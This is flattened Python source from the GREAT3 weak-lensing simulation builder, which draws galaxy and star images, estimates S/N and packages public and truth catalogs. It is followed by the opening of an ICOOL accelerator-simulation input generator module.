# fairly consistent with the estimated one. Turn it to True if you want to run this
# code.
if False:
# G08 is the best possible S/N estimate:
# S = sum W(x,y) I(x,y) / sum W(x,y)
# N^2 = Var(S) = sum W(x,y)^2 Var(I(x,y)) / (sum W(x,y))^2
# with W(x,y) = I(x,y), so
# S = sum I^2(x,y) / sum I(x,y)
# N^2 = noise variance * sum I^2(x,y) / (sum I(x,y))^2
# S/N = sqrt(sum I^2(x,y)) / sqrt(noise variance)
actual_sn_g08 = \
numpy.sqrt((stamp.array**2).sum() / float(epoch_parameters['noise']['variance']))
try:
res = stamp.FindAdaptiveMom()
aperture_noise = numpy.sqrt(float(epoch_parameters['noise']['variance']) * \
2.*numpy.pi*(res.moments_sigma**2))
# The number below is the flux S/N within an elliptical Gaussian filter. My
# guess is that it will be somewhere below the optimal actual_sn_g08 but not too
# horrible.
sn_ellip_gauss = res.moments_amp / aperture_noise
# We also want to estimate the S/N on the size, using an unweighted estimator
# S = Sum I(x,y) [(x-x_c)^2 + (y-y_c)^2]
# N^2 = (noise variance) * Sum [(x-x_c)^2 + (y-y_c)^2]^2
# For this, we use the centroid estimate from the adaptive moments. But we also
# have to set up the grid of x, y values for the postage stamp, according to the
# same exact convention as used for adaptive moments, which is that the center
# of the first pixel is 1. I do not like this estimator because if we make the
# postage stamp larger (with white space) then S doesn't change but N^2
# changes. So let's instead use a weighted version:
# S = Sum W(x,y) I(x,y) [(x-x_c)^2 + (y-y_c)^2] / Sum W(x,y)
# N^2 = (noise variance) * Sum W^2(x,y) [(x-x_c)^2 + (y-y_c)^2]^2 /
# (Sum W(x,y))^2
# Use W(x,y) = I(x,y),
# S = Sum I(x,y)^2 [(x-x_c)^2 + (y-y_c)^2] / Sum I(x,y)
# N^2 = (noise variance) * Sum I^2(x,y) [(x-x_c)^2 + (y-y_c)^2]^2 /
# (Sum I(x,y))^2
# S/N = Sum I(x,y)^2 [(x-x_c)^2 + (y-y_c)^2] /
# sqrt[(noise variance) * Sum I^2(x,y) [(x-x_c)^2 + (y-y_c)^2]^2]
if stamp.array.shape[0] != stamp.array.shape[1]:
raise RuntimeError("Diagnostic S/N estimate assumes square postage stamps!")
min_val = 1.
max_val = float(stamp.array.shape[0]+1)
x_pix, y_pix = numpy.meshgrid(numpy.arange(min_val, max_val, 1.),
numpy.arange(min_val, max_val, 1.))
dx_pix = x_pix - (res.moments_centroid.x - (res.image_bounds.xmin-1))
dy_pix = y_pix - (res.moments_centroid.y - (res.image_bounds.ymin-1))
sn_size = numpy.sum(stamp.array**2 * (dx_pix**2 + dy_pix**2)) / \
numpy.sqrt(float(epoch_parameters['noise']['variance']) * \
numpy.sum(stamp.array**2 * (dx_pix**2 + dy_pix**2)**2))
except Exception:
sn_ellip_gauss = -10.
sn_size = -10.
print 'SN: ', record['gal_sn'], actual_sn_g08, sn_ellip_gauss, sn_size, \
record['bulge_n'], record['bulge_hlr'], record['bulge_flux']
# Now, actually add the noise to this postage stamp.
self.noise_builder.addNoise(rng, epoch_parameters['noise'], stamp, current_var)
# Write the entire big image to the appropriate file, as determined by the mapper.
self.mapper.write(galaxy_image, "image", epoch_parameters)
def writePSFImage(self, subfield_index, epoch_index):
"""This method builds and writes the star field images for a particular subfield and epoch
to disk. It was not used for generation of the GREAT3 simulations, since the GalSim config
interface allows the work done here to be parallelized much more effectively. However, for
testing and generation of small images this method can be useful.
"""
# Read in the epoch parameters and star catalog.
epoch_parameters = self.mapper.read("epoch_parameters", subfield_index=subfield_index,
epoch_index=epoch_index)
star_catalog = self.mapper.read("star_catalog", epoch_parameters)
seed = epoch_parameters["noise_seed"]
# Define basic numbers like pixel scale and size of postage stamps.
pixel_scale = constants.pixel_scale[self.obs_type][self.multiepoch]
xsize = constants.xsize[self.obs_type][self.multiepoch]
ysize = constants.ysize[self.obs_type][self.multiepoch]
# Make a galsim.Pixel representing the top-hat pixel.
pixel = galsim.Pixel(pixel_scale)
# Set up the image for the star field. Its size depends on whether this is a constant PSF
# or variable PSF branch.
if self.variable_psf:
n_star_linear = epoch_parameters["psf"]["n_star_linear"]
star_image = galsim.ImageF(n_star_linear * xsize,
n_star_linear * ysize,
scale=pixel_scale)
else:
star_image = galsim.ImageF(constants.nx_constpsf * xsize,
constants.ny_constpsf * ysize,
scale=pixel_scale)
star_image.setOrigin(0, 0)
# Set up a cache for the galsim.GSObject corresponding to this star. This is useful for
# constant PSF branches, for which the star is the same in each star image (just shifted).
cached_psf_obj = None
for record in star_catalog:
rng = galsim.UniformDeviate(seed)
seed = seed + 1
# Define the bounds of this postage stamp.
bbox = galsim.BoundsI(
xmin=int(record['xmin']), ymin=int(record['ymin']),
xmax=int(record['xmax']), ymax=int(record['ymax']),
)
stamp = star_image.subImage(bbox)
# Build PSF (or take cached value if possible).
if not self.variable_psf:
if cached_psf_obj is None:
psf = self.psf_builder.makeGalSimObject(record, epoch_parameters["psf"])
cached_psf_obj = psf
else:
psf = cached_psf_obj
else:
psf = self.psf_builder.makeGalSimObject(record, epoch_parameters["psf"])
# Convolve with the pixel response.
final = galsim.Convolve([psf, pixel])
offset = galsim.PositionD(record['xshift'],record['yshift'])
# Draw into the postage stamp, including the centroid shift with the draw() method
# (rather than actually shifting the GSObject). The draw() `offset` keyword takes pixel
# units, rather than arcsec.
final.draw(stamp, normalization='f', offset=offset)
# Only the variable PSF branches have noisy star fields, so add noise in that case.
if self.variable_psf:
self.noise_builder.addStarImageNoise(
rng, epoch_parameters['noise'], record['star_snr'], stamp)
# Write the entire star field image to file.
self.mapper.write(star_image, "starfield_image", epoch_parameters)
def writeStarParameters(self, subfield_index, epoch_index):
"""This method writes out a dict for the PSF shapes needed for metric calculation. The
metric calculation for constant shear requires us to know the direction of PSF anisotropy,
so we measure some of the star shapes from the star images. (We cannot do this based on the
catalogs since the stars are the composition of an aberrated optical PSF and an atmospheric
PSF, for which the composite shape is not obvious.)
"""
# Only do this for constant shear, not variable shear! The star shapes are needed to create
# the metric for the constant shear branch fits to (m, c) values.
if self.shear_type == "variable":
return
# Read in epoch parameters and a star catalog.
epoch_parameters = self.mapper.read("epoch_parameters", subfield_index=subfield_index,
epoch_index=epoch_index)
star_catalog = self.mapper.read("star_catalog", epoch_parameters)
seed = epoch_parameters["noise_seed"]
# Read in the star image.
star_image = self.mapper.read("starfield_image", epoch_parameters)
starshape_parameters = None
if not self.variable_psf:
for record in star_catalog:
bbox = galsim.BoundsI(
xmin=int(record['xmin']), ymin=int(record['ymin']),
xmax=int(record['xmax']), ymax=int(record['ymax']),
)
stamp = star_image.subImage(bbox)
if starshape_parameters is None:
try:
shape_res = galsim.hsm.FindAdaptiveMom(stamp)
star_g1 = shape_res.observed_shape.g1
star_g2 = shape_res.observed_shape.g2
except Exception:
star_g1 = -10.
star_g2 = -10.
starshape_parameters = {"psf_g1": star_g1,
"psf_g2": star_g2,
"subfield_index": subfield_index,
"epoch_index": epoch_index}
# For variable PSF, choose a random subset of the stars to measure. We can just use the
# first N in the catalog, since they correspond to completely random positions in the field.
if self.variable_psf:
# We will use 1% of the stars. Use ceil() to make sure that we don't end up with zero
# for test runs with few stars.
n_star_use = int(numpy.ceil(0.01*len(star_catalog)))
sub_catalog = star_catalog[0:n_star_use]
for record in sub_catalog:
bbox = galsim.BoundsI(
xmin=int(record['xmin']), ymin=int(record['ymin']),
xmax=int(record['xmax']), ymax=int(record['ymax']),
)
stamp = star_image.subImage(bbox)
try:
shape_res = galsim.hsm.FindAdaptiveMom(stamp)
star_g1 = shape_res.observed_shape.g1
star_g2 = shape_res.observed_shape.g2
if starshape_parameters is None:
starshape_parameters = {"psf_g1": star_g1,
"psf_g2": star_g2,
"subfield_index": subfield_index,
"epoch_index": epoch_index,
"n_star_actual": 1}
else:
starshape_parameters["psf_g1"] += star_g1
starshape_parameters["psf_g2"] += star_g2
starshape_parameters["n_star_actual"] += 1
except Exception:
# Skip stars whose shapes could not be measured.
pass
# Now normalize average shapes.
if starshape_parameters is not None:
if starshape_parameters["n_star_actual"] > 1:
starshape_parameters["psf_g1"] /= starshape_parameters["n_star_actual"]
starshape_parameters["psf_g2"] /= starshape_parameters["n_star_actual"]
else:
starshape_parameters = {"psf_g1": -10.,
"psf_g2": -10.,
"subfield_index": subfield_index,
"epoch_index": epoch_index,
"n_star_actual": 0}
# Write the results to the appropriate file using the mapper.
self.mapper.write(starshape_parameters, "starshape_parameters", starshape_parameters)
def packagePublic(self, subfield_min, subfield_max):
"""This method packages up the public outputs (no truth values) into a single big tarfile
for this branch. We can choose to use a subset of the subfields if we wish."""
import shutil
import tarfile
# First, do some basic calculations related to the deep fields. If they are included in the
# range of requested subfields, i.e., (subfield_min, ..., subfield_max), then things are
# slightly more complicated: we have to choose which of those subfields to actually package
# up, since we only want the deep fields to be a certain fraction of the field overall.
# Also, we change the name on output, because we want to be completely clear that these are
# not typical images.
n_deep_subfields = constants.n_deep_subfields
n_reg_subfields = constants.n_subfields - n_deep_subfields
n_deep_to_output = int(round(constants.deep_frac * n_reg_subfields))
max_reg_subfield = n_reg_subfields - 1
min_deep_subfield = n_reg_subfields
max_deep_subfield = n_reg_subfields + n_deep_to_output - 1
if subfield_max > max_deep_subfield:
import warnings
deep_warning = "Requested range of subfields includes extra deep fields. Adjusting."
warnings.warn(deep_warning)
subfield_max = max_deep_subfield
# Define the output directory (and create if necessary). Use a mapper for this.
public_mapper = great3sims.mapper.Mapper(self.public_dir, self.experiment, self.obs_type,
self.shear_type)
# Also define an absolute path to the root directory structure, because we're going to be
# moving around, so self.mapper (which uses relative path) won't work.
root_rel_mapper = great3sims.mapper.Mapper(os.path.abspath(self.mapper.root),
self.experiment, self.obs_type, self.shear_type)
# Zipping / tarring. Open tarfile at the start, then add the files as they are created.
tarfile_name = os.path.join(self.public_dir,
self.experiment+'-'+self.obs_type+'-'+self.shear_type+'.tar.gz')
tar = tarfile.open(tarfile_name, "w:gz")
# Now we want to move into public_dir. The reason for this is that we don't want the files
# in public_dir that go into the tarfile to have public_dir/ at the start of their paths,
# otherwise when untarred they end up in public_dir/public_dir/... which is kind of silly.
saved_path = os.getcwd()
os.chdir(self.public_dir)
sub_mapper = great3sims.mapper.Mapper('.', self.experiment, self.obs_type, self.shear_type)
for subfield_index in xrange(subfield_min, subfield_max+1):
# Loop over galaxy and star field images for the defined set of subfields and epochs,
# and copy over without modification of any sort.
tmp_dict = {"subfield_index" : subfield_index}
if subfield_index > max_reg_subfield:
tmp_dict["deep_subfield_index"] = subfield_index - n_reg_subfields
for epoch_index in xrange(self.n_epochs):
tmp_dict["epoch_index"] = epoch_index
if subfield_index <= max_reg_subfield:
outfile = root_rel_mapper.copyTo(sub_mapper, 'image', tmp_dict)
tar.add(outfile)
outfile = root_rel_mapper.copyTo(sub_mapper, 'starfield_image', tmp_dict)
tar.add(outfile)
else:
outfile = root_rel_mapper.copyTo(sub_mapper, 'image', tmp_dict,
new_template = "deep_image-%(deep_subfield_index)03d-%(epoch_index)1d.fits")
tar.add(outfile)
outfile = root_rel_mapper.copyTo(sub_mapper, 'starfield_image', tmp_dict,
new_template = \
"deep_starfield_image-%(deep_subfield_index)03d-%(epoch_index)1d.fits")
tar.add(outfile)
# Loop over galaxy catalogs for each subfield, and copy only the information we want to
# be public. For now, let's stick with 'x', 'y', 'ID'. We could consider giving the
# information on position within the field, but for now, that's encoded in ID rather
# than being given explicitly in the catalog. Also, the subfield offset will be output
# separately, so that can be used with x / y to get positions in degrees, assuming the
# user understands how to go from x / y to degrees in a single subfield.
# However... if this is a variable_psf branch, then we want to explicitly output
# information about the location within the field, the tile, and location within the
# tile.
# Unfortunately this is in the epoch_catalog files rather than subfield_catalog
# ("unfortunately" because it's the same for all epochs and means we have to read in
# multiple files) so in that case we have to read in that info as well, and merge the
# bits of info together. Bah.
gal_use_cols = [('x', int), ('y', int), ('ID', int)]
if self.variable_psf:
gal_epoch_use_cols = [('x_tile_index', int), ('y_tile_index', int),
('tile_x_pos_deg', float), ('tile_y_pos_deg', float),
('x_field_true_deg', float), ('y_field_true_deg', float)]
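            # For reference, the column subsetting that copySub performs can be
            # reproduced with pyfits roughly as follows (illustrative sketch
            # only, with a hypothetical filename; great3sims routes this
            # through the mapper rather than doing it inline):
            #   import pyfits
            #   data = pyfits.getdata('galaxy_catalog-000.fits', 1)
            #   subset = data[['x', 'y', 'ID']]  # keep only the public columns
            #   pyfits.writeto('public_catalog-000.fits', subset, clobber=True)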
if subfield_index <= max_reg_subfield:
tmp_dict = {"subfield_index" : subfield_index}
if self.variable_psf:
tmp_dict["epoch_index"] = 0
outfile = root_rel_mapper.mergeSub(sub_mapper, 'subfield_catalog',
'epoch_catalog', tmp_dict, gal_use_cols,
gal_epoch_use_cols,
new_template =
"galaxy_catalog-%(subfield_index)03d")
else:
outfile = root_rel_mapper.copySub(sub_mapper, 'subfield_catalog', tmp_dict,
gal_use_cols,
new_template =
"galaxy_catalog-%(subfield_index)03d")
else:
tmp_dict["deep_subfield_index"] = subfield_index - n_reg_subfields
if self.variable_psf:
tmp_dict["epoch_index"] = 0
outfile = root_rel_mapper.mergeSub(sub_mapper, 'subfield_catalog',
'epoch_catalog', tmp_dict, gal_use_cols,
gal_epoch_use_cols,
new_template =
"deep_galaxy_catalog-%(subfield_index)03d")
else:
                    # This block must stay inside the 'else': otherwise it would
                    # overwrite the merged FITS catalog with one lacking columns
                    # that the variable PSF experiments require, and the text
                    # versions generated below would inherit the same omission.
outfile = root_rel_mapper.copySub(sub_mapper, 'subfield_catalog', tmp_dict,
gal_use_cols,
new_template =
"deep_galaxy_catalog-%(deep_subfield_index)03d")
tar.add(outfile)
# ... and also copy to text file that gets added to the tarball.
outfile_no_ext = os.path.splitext(outfile)[0]
great3sims.mapper.fitsToTextCatalog(outfile_no_ext)
tar.add(outfile_no_ext + '.txt')
# Loop over star catalogs, and copy only the information that we want to be public. For
# constant PSF branches, this is just 'x' and 'y'. For variable PSF branches, we want
# the same additional info as was given for the galaxies re: position within the field
# and tiles.
if self.variable_psf:
star_use_cols = [('x', int), ('y', int), ('x_tile_index', int),
('y_tile_index', int), ('tile_x_pos_deg', float),
('tile_y_pos_deg', float), ('x_field_true_deg', float),
('y_field_true_deg', float)]
else:
star_use_cols = [('x', int), ('y', int)]
if subfield_index <= max_reg_subfield:
tmp_dict = {"subfield_index" : subfield_index, "epoch_index" : 0}
outfile = root_rel_mapper.copySub(
sub_mapper, 'star_catalog', tmp_dict, star_use_cols,
new_template="star_catalog-%(subfield_index)03d")
else:
tmp_dict["deep_subfield_index"] = subfield_index - n_reg_subfields
tmp_dict["epoch_index"] = 0
outfile = root_rel_mapper.copySub(
sub_mapper, 'star_catalog', tmp_dict, star_use_cols,
new_template="deep_star_catalog-%(deep_subfield_index)03d")
# ... and also copy to text file that gets added to the tarball.
outfile_no_ext = os.path.splitext(outfile)[0]
great3sims.mapper.fitsToTextCatalog(outfile_no_ext)
tar.add(outfile)
tar.add(outfile_no_ext+'.txt')
# We can also give some overall information about subfield offsets. For now, we use the
# subfield_parameters file, extract subfield_offset [which currently is in units of
# separation between galaxies in the grid], convert that to degrees, and output that as
# a yaml file and a text file. This is redundant, but since the files are tiny it
# doesn't seem like a big issue to support both formats.
template, reader, writer = root_rel_mapper.mappings['subfield_parameters']
in_path = os.path.join(root_rel_mapper.full_dir, template % tmp_dict)
subfield_params = great3sims.mapper.readDict(in_path)
mult_val = constants.image_size_deg / constants.nrows
offset_parameters = {
"offset_deg_x": mult_val * subfield_params['subfield_offset'][0],
"offset_deg_y": mult_val * subfield_params['subfield_offset'][1]
}
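            # For concreteness (numbers hypothetical): with image_size_deg = 10.0
            # and nrows = 100, mult_val = 0.1 deg per grid spacing, so a stored
            # subfield_offset of (3, 5) becomes (0.3, 0.5) degrees here.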
if subfield_index <= max_reg_subfield:
template = "subfield_offset-%(subfield_index)03d"
else:
template = "deep_subfield_offset-%(deep_subfield_index)03d"
outfile = os.path.join(sub_mapper.full_dir, template % tmp_dict)
great3sims.mapper.writeDict(offset_parameters, outfile)
great3sims.mapper.writeDict(offset_parameters, outfile, type='txt')
tar.add(outfile + '.yaml')
tar.add(outfile + '.txt')
# Finally, for each epoch, we need to give information about the size of the dithering
# with respect to the first epoch. For the sake of having a consistent data format for
# all branches, we include this even for single epoch branches (for which the dithers
# are all 0 since each image IS the first and only epoch). We extract the xdither and
# ydither from the epoch_parameters, and write a file for each subfield and epoch.
# These files are tiny, so let's write one for each subfield and epoch, in both yaml and
# txt format.
for epoch_index in xrange(self.n_epochs):
tmp_dict["epoch_index"] = epoch_index
template, reader, writer = root_rel_mapper.mappings['epoch_parameters']
in_path = os.path.join(root_rel_mapper.full_dir, template % tmp_dict)
epoch_params = great3sims.mapper.readDict(in_path)
dither_parameters = {
"xdither_pixels": epoch_params['xdither'],
"ydither_pixels": epoch_params['ydither']
}
if subfield_index <= max_reg_subfield:
template = "epoch_dither-%(subfield_index)03d-%(epoch_index)1d"
else:
template = "deep_epoch_dither-%(deep_subfield_index)03d-%(epoch_index)1d"
outfile = os.path.join(sub_mapper.full_dir, template % tmp_dict)
great3sims.mapper.writeDict(dither_parameters, outfile)
great3sims.mapper.writeDict(dither_parameters, outfile, type='txt')
tar.add(outfile + '.yaml')
tar.add(outfile + '.txt')
# Close the tarfile. Now that we're done with it, we can go back to our original working
# directory.
tar.close()
os.chdir(saved_path)
# Delete the files / dirs, just keep the tarfiles.
shutil.rmtree(public_mapper.full_dir)
def packageTruth(self, subfield_min, subfield_max):
"""This method packages up the true shear values and PSF ellipticities for metric
calculations.
"""
import shutil
import tarfile
# First, do some basic calculations related to the deep fields. If they are included in the
# range of requested subfields, i.e., (subfield_min, ..., subfield_max), then emit a warning
# that we are excluding them because they are not used for metric evaluation.
n_deep_subfields = constants.n_deep_subfields
n_reg_subfields = constants.n_subfields - n_deep_subfields
if subfield_max > n_reg_subfields - 1:
import warnings
deep_warning = "Requested range of subfields includes deep fields. Adjusting."
warnings.warn(deep_warning)
subfield_max = n_reg_subfields - 1
# Define the output directory (and create if necessary). Use a mapper for this.
truth_mapper = great3sims.mapper.Mapper(self.truth_dir, self.experiment, self.obs_type,
self.shear_type)
# Also define an absolute path to the root directory structure, because we're going to be
# moving around, so self.mapper (which uses relative path) won't work.
root_rel_mapper = great3sims.mapper.Mapper(os.path.abspath(self.mapper.root),
self.experiment, self.obs_type, self.shear_type)
# Zipping / tarring. Open tarfile at the start, then add the files as they are created.
tarfile_name = os.path.join(self.truth_dir,
self.experiment+'-'+self.obs_type+'-'+self.shear_type+'.tar.gz')
tar = tarfile.open(tarfile_name, "w:gz")
# Now we want to move into truth_dir. The reason for this is that we don't want the files
# in truth_dir that go into the tarfile to have truth_dir/ at the start of their paths,
# otherwise when untarred they end up in truth_dir/truth_dir/... which is kind of silly.
saved_path = os.getcwd()
os.chdir(self.truth_dir)
sub_mapper = great3sims.mapper.Mapper('.', self.experiment, self.obs_type, self.shear_type)
# First, we copy over the star test catalog and images.
# Make the old, new target filenames for the star test catalog:
template, reader, writer = root_rel_mapper.mappings['star_test_catalog']
infile = os.path.join(root_rel_mapper.full_dir, template % {}) + '.fits'
outfile = os.path.join(sub_mapper.full_dir, template % {}) + '.fits'
shutil.copy2(infile, outfile)
tar.add(outfile)
template, reader, writer = root_rel_mapper.mappings['star_test_images']
infile = os.path.join(root_rel_mapper.full_dir, template % {}) + '.fits'
outfile = os.path.join(sub_mapper.full_dir, template % {}) + '.fits'
if os.path.exists(infile):
shutil.copy2(infile, outfile)
tar.add(outfile)
# Now do all the per-subfield stuff.
for subfield_index in xrange(subfield_min, subfield_max+1):
tmp_dict = {"subfield_index" : subfield_index}
# If variable shear, then loop over subfield catalogs and copy over just the ID and the
# per-galaxy reduced shear.
if self.shear_type == 'variable':
use_cols = [('ID', int), ('g1', float), ('g2', float),
('g1_intrinsic', float), ('g2_intrinsic', float)]
outfile = root_rel_mapper.copySub(sub_mapper, 'subfield_catalog', tmp_dict,
use_cols,
new_template =
"galaxy_catalog-%(subfield_index)03d")
tar.add(outfile)
# We can also give some overall information about subfield offsets. This is
# necessary for variable shear sims in order to convert the positions in each
# subfield to a position in the field. For now, we use the subfield_parameters
# file, extract subfield_offset [which currently is in units of separation between
# galaxies in the grid], convert that to degrees, and output that as a yaml file and
# a text file. This is redundant, but since the files are tiny it doesn't seem like
# a big issue to support both formats.
template, reader, writer = root_rel_mapper.mappings['subfield_parameters']
in_path = os.path.join(root_rel_mapper.full_dir, template % tmp_dict)
subfield_params = great3sims.mapper.readDict(in_path)
mult_val = constants.image_size_deg / constants.nrows
offset_parameters = {
"offset_deg_x": mult_val * subfield_params['subfield_offset'][0],
"offset_deg_y": mult_val * subfield_params['subfield_offset'][1]
}
template = "subfield_offset-%(subfield_index)03d"
outfile = os.path.join(sub_mapper.full_dir, template % tmp_dict)
great3sims.mapper.writeDict(offset_parameters, outfile)
great3sims.mapper.writeDict(offset_parameters, outfile, type='txt')
tar.add(outfile + '.yaml')
tar.add(outfile + '.txt')
else:
# If constant shear, then take the subfield g1, g2 and write as yaml/text.
template, reader, writer = root_rel_mapper.mappings['subfield_parameters']
in_path = os.path.join(root_rel_mapper.full_dir, template % tmp_dict)
subfield_params = great3sims.mapper.readDict(in_path)
shear_params = {
"g1": subfield_params['shear']['g1'],
"g2": subfield_params['shear']['g2']
}
template = "shear_params-%(subfield_index)03d"
outfile = os.path.join(sub_mapper.full_dir, template % tmp_dict)
great3sims.mapper.writeDict(shear_params, outfile)
great3sims.mapper.writeDict(shear_params, outfile, type='txt')
tar.add(outfile + '.yaml')
tar.add(outfile + '.txt')
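                # The resulting shear_params-XXX.yaml is just this two-key
                # mapping, e.g. (hypothetical values):
                #   g1: 0.0312
                #   g2: -0.0145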
# If this branch has constant shear, then we need the PSF (star) shape parameters.
if self.shear_type == "constant":
# And loop over epochs, copying over the PSF shape parameter files. Can't use
# copyTo() because we want to write as .txt in addition to .yaml
for epoch_index in xrange(self.n_epochs):
tmp_dict["epoch_index"] = epoch_index
template, reader, writer = root_rel_mapper.mappings['starshape_parameters']
in_path = os.path.join(root_rel_mapper.full_dir, template % tmp_dict)
starshape_params = great3sims.mapper.readDict(in_path)
outfile = os.path.join(sub_mapper.full_dir, template % tmp_dict)
great3sims.mapper.writeDict(starshape_params, outfile)
great3sims.mapper.writeDict(starshape_params, outfile, type='txt')
tar.add(outfile + '.yaml')
tar.add(outfile + '.txt')
# Close the tarfile. Now that we're done with it, we can go back to our original working
# directory.
tar.close()
os.chdir(saved_path)
# Delete the files / dirs, just keep the tarfiles.
shutil.rmtree(truth_mapper.full_dir)
def generateSubfieldOffsets(self, rng, n_subfields_per_field, subfield_grid_subsampling):
"""A utility to decide about the offsets between subfields in a field.
Currently, the offsets are required to be regular, so that the shear and PSF builders can
simply make an overly dense grid compared to what's needed for a subfield, and use a subset
of its grid points. (This eliminates the need to interpolate the shears, which is useful
since interpolation of shear fields was not tested in GalSim until after the GREAT3 sims
were made.) We assume that the options for offsetting are on an subfield_grid_subsampling x
subfield_grid_subsampling grid. This then gives subfield_grid_subsampling^2 possible
locations. We then choose a random n_subfields_per_field-1 of those options for the
subfields that are not the first in the field.
Offsets between subfields in a field are first specified as integers and are defined as the
offset with respect to the first subfield in the field. Then, we divide by the amount of
grid subsampling for subfields in a field. For example, if subfield_grid_subsampling = 7,
then the minimum and maximum values for x/y offsets are 0/7 and 6/7. Because of our
definition with respect to the first subfield, that subfield must get offset (0, 0).
Results for offsets for each subfield are returned as a list of tuples, where the length of
the list is determined by n_subfields_per_field.
"""
# Check for the simplest case, and do it.
if n_subfields_per_field == 1:
offsets = []
offsets.append((0., 0.))
return offsets
else:
# first do everything in terms of ints, for easier comparison
int_offsets = []
int_offsets.append((0, 0))
for i_subfield in range(n_subfields_per_field-1):
test_tuple = (0, 0)
# Make sure we end up with a unique one that does not exist in int_offsets
while test_tuple in int_offsets:
                    test_tuple = (int(numpy.floor(rng()*subfield_grid_subsampling)),
                                  int(numpy.floor(rng()*subfield_grid_subsampling)))
int_offsets.append(test_tuple)
offsets = [(float(int_offset[0])/subfield_grid_subsampling,
float(int_offset[1])/subfield_grid_subsampling)
for int_offset in int_offsets]
return offsets
| lsst-dm/great3-public | great3sims/builder.py | Python | bsd-3-clause | 90,392 | ["Galaxy", "Gaussian"] | fa14da325120cdf7f190c605207f816d4e740b1ea1649243406ef82c9a824863 |
# -*- coding: utf-8 -*-
import sys
import icool_exceptions as ie
import copy
"""Nomenclature:
An ICOOL input file consists of:
1. Problem title
2. General control variables
3. Beam generation variables
4. Physics interactions control variables
5. Histogram definition variables
6. Scatterplot definition variables
7. Z-history definition variables
8. R-history definition variables
9. Emittance plane definition variables
10. Covariance plane definition variables
11. Region definition variables.
** Note that region definition variables are referred to in the ICOOL Manual and
herein as commands.
This program will use the following object definitions:
Namelists. Namelists in the for001.dat file are preceded by an '&'
sign (e.g., &cont).
Namelists include:
CONT: Control Variables
BMT: Beam Generation Variables
INTS: Physics Interactions Control Variables
NHS: Histogram Definition Variables
NSC: Scatterplot definition Variables
NZH: Z-History Definition Variables
NRH: R-History Definition Variables
NEM: Emittance Plane Definition Variables
NCV: Covariance Plane Definition Variables
Namelist variables:
Each of the above namelists is associated with a respective set of variables.
Commands:
Commands comprise both Regular Region Commands and Pseudoregion Commands
Regular Region Commands:
SECTION
BEGS
REPEAT
CELL
SREGION
ENDREPEAT
ENDCELL
ENDSECTION
Pseudoregion Commands:
APERTURE
CUTV
DENP
DENS
DISP
DUMMY
DVAR
EDGE
GRID
OUTPUT
RESET
RKICK
ROTATE
TAPER
TILT
TRANSPORT
BACKGROUND
BFIELD
ENDB
!
&
Command parameters:
Each regular region and pseudoregion command is associated with its own set of command parameters.
"""
from IPython.core.magic_arguments import (argument, magic_arguments,
parse_argstring)
from IPython.core.magic import (register_line_magic, register_cell_magic,
register_line_cell_magic)
#@register_line_magic
@magic_arguments()
@argument('-o', '--option', help='An optional argument.')
@argument('arg', type=int, help='An integer positional argument.')
def ipycool(line):
    """ A really cool ipycool magic command.
    """
    args = parse_argstring(ipycool, line)
    return args
@register_line_magic
def icool(line):
    "Run the ICOOL executable from the IPython shell."
    from IPython import get_ipython
    get_ipython().system('icool')
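# If the ipycool magic above were registered (its @register_line_magic
# decorator is commented out), it would be invoked from an IPython session
# roughly as follows (sketch only; the argument handling above is a stub):
#   %ipycool -o foo 42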
class ICoolGenerator(object):
def get_base_classes(self):
base_tuple = self.__class__.__bases__
bases_names = tuple()
for c in base_tuple:
bases_names += tuple([c.__name__])
return bases_names
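    # Note: __class__.__bases__ lists only the direct base classes. To walk
    # the full inheritance chain one could instead use the MRO, e.g.:
    #   tuple(c.__name__ for c in type(self).__mro__)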
def icoolgenerate_for001(self, file):
base_classes = self.get_base_classes()
if 'ICoolNameList' in base_classes:
ICoolNameList.gen_for001(self, file)
if 'Container' in base_classes:
Container.gen_for001(self, file)
else:
            if 'RegularRegion' in base_classes or 'PseudoRegion' in base_classes:
Region.gen_begtag(self, file)
Region.gen_for001(self, file)
if 'Container' in base_classes:
Container.gen_for001(self, file)
Region.gen_endtag(self, file)
def gen_begtag(self, file):
if hasattr(self, 'begtag'):
file.write(self.begtag)
file.write('\n')
def gen_endtag(self, file):
if hasattr(self, 'endtag'):
file.write(self.endtag)
file.write('\n')
class ICoolObject(object):
"""Generic ICOOL object providing methods for"""
def __init__(self, kwargs):
if self.check_command_params_init(kwargs) is False:
sys.exit(0)
else:
self.setall(kwargs)
def __call__(self, kwargs):
if self.check_command_params_call(kwargs) is False:
sys.exit(0)
else:
self.setall(kwargs)
def __str__(self, return_str):
command_parameters_dict = self.command_params
for key in command_parameters_dict:
if hasattr(self, key):
return_str += '\n'
return_str += key
return_str += ': '
return_str += str(getattr(self, key))
return return_str
def __repr__(self):
return '[ICool Object]'
"""Checks whether all required command parameters specified in __init__ are provided are valid
for the command.
Valid means the parameters are recognized for the command, all required parameters are provided
and the parameters are the correct type."""
def __setattr__(self, name, value):
if self.check_command_param(name):
object.__setattr__(self, name, value)
else:
sys.exit(0)
def check_command_param(self, command_param):
"""
Checks whether a parameter specified for command is valid.
"""
command_parameters_dict = self.get_command_params()
# Check command parameters are all valid
try:
if command_param not in command_parameters_dict:
raise ie.InvalidCommandParameter(
command_param,
command_parameters_dict.keys())
except ie.InvalidCommandParameter as e:
print e
return False
except ie.InvalidType as e:
print e
return False
return True
def check_command_params_valid(
self,
command_params,
command_parameters_dict):
"""Returns True if command_params are valid (correspond to the command)
Otherwise raises an exception and returns False"""
# command_parameters_dict = self.get_command_params()
try:
for key in command_params:
if key not in command_parameters_dict:
raise ie.InvalidCommandParameter(
key,
command_parameters_dict)
except ie.InvalidCommandParameter as e:
print e
return False
return True
def check_all_required_command_params_specified(
self,
command_params,
command_parameters_dict):
"""Returns True if all required command parameters were specified
Otherwise raises an exception and returns False"""
# command_parameters_dict = self.get_command_params()
try:
for key in command_parameters_dict:
if self.is_required(key, command_parameters_dict):
if key not in command_params:
raise ie.MissingCommandParameter(key, command_params)
except ie.MissingCommandParameter as e:
print e
return False
return True
def check_command_params_type(self, command_params, command_params_dict):
"""Checks to see whether all required command parameters specified were of the correct type"""
# command_params_dict = self.get_command_params()
try:
for key in command_params:
if self.check_type(
command_params_dict[key]['type'],
command_params[key]) is False:
raise ie.InvalidType(
command_params_dict[key]['type'],
command_params[key].__class__.__name__)
except ie.InvalidType as e:
print e
return False
return True
def check_command_param_type(self, name, value):
"""Checks to see whether a particular command parameter of name with value is of the correct type"""
command_params_dict = self.get_command_params()
try:
if self.check_type(
command_params_dict[name]['type'],
value) is False:
raise ie.InvalidType(
command_params_dict[name]['type'],
value.__class__.__name__)
except ie.InvalidType as e:
print e
return False
return True
def check_command_params_init(self, command_params):
"""
